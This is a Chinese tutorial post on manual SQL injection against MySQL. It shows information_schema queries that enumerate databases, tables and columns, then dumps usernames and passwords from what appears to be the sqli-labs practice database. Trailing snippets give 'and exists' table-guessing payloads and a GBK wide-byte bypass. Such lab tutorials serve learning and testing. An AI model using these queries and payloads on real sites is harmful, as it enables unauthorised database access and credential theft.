sql注入猜解庫,表,列!

2022-08-19 17:12:09 字數 2373 閱讀 9357

mysql有乙個系統資料庫information_schema,儲存著所有的資料相關資訊,一般的,可以利用該錶進行一次完整的注入。以下為一般的流程。

猜資料庫:

select schema_name from information_schema.schemata; 

mariadb [information_schema]> select


schema_name from information_schema.schemata;


+--------------------+


| schema_name        |


+--------------------+


| information_schema |


| cms                |


| performance_schema |


| mysql              |


| test               |


+--------------------+


5 rows in set (0.001 sec)

猜某庫的資料表名:

select table_name from information_schema.tables where table_schema = '

test

';

mariadb [information_schema]> select table_name from information_schema.tables where table_schema = '


test';


+------------+


| table_name |


+------------+


| person     |


| emails     |


| referers   |


| users      |


| uagents    |


| runoob_tbl |


+------------+


6 rows in set (0.001 sec)

猜某錶的所有列:

select column_name from information_schema.columns where table_name ='

users

';

mariadb [information_schema]> select column_name from information_schema.columns where table_name ='


users';


+---------------------+


| column_name         |


+---------------------+


| user                |


| current_connections |


| total_connections   |


| id                  |


| username            |


| password            |


+---------------------+


6 rows in set (0.001 sec)

猜取某列的內容:

select username,password from test.users;

mariadb [information_schema]> select


username,password from test.users;


+----------+------------+


| username | password   |


+----------+------------+


| dumb     | dumb       |


| angelina | i-kill-you |


| dummy    | p@ssword   |


| stupid   | stupidity  |


| superman | genious    |


| batman   | mob!le     |


| admin    | admin      |


| admin1   | admin1     |


| admin2   | admin2     |


| admin3   | admin3     |


| dhakkan  | dumbo      |


| admin4   | admin4     |


+----------+------------+


13 rows in set (0.000 sec)

SQL注入 表的猜解

表名 列名 列長度 具體值 例如 注入點 猜解表名 and exists select from 猜測的表名 猜解列名 and exists select 猜測的列名 from 已知表名 猜測列長度 and select top 1 len 已知列名 from admin 猜測的值長度 如5 top...

sql注入,手動猜表名欄位名

方法從網上看來的,記下來以後看。1,猜表名 錯誤結果顯示公尺有user表。abc.asp?id 12 and 0 select count from admin 載入。說明存在表admin。2,猜欄位名 abc.asp?id 12 and 0 select count id from admin 載...

SQL注入(三) sql注入 bugku

原理 mysql 在使用 gbk 編碼的時候,會認為兩個字元為乙個漢字,例如 aa 5c 就是乙個 漢字 前乙個 ascii碼大於 128 才能到漢字的範圍 我們在過濾 的時候,往往利用的思 路是將 轉換為 換的函式或者思路會在每一關遇到的時候介紹 因此我們在此想辦法將 前面新增的 除掉,一般有兩種...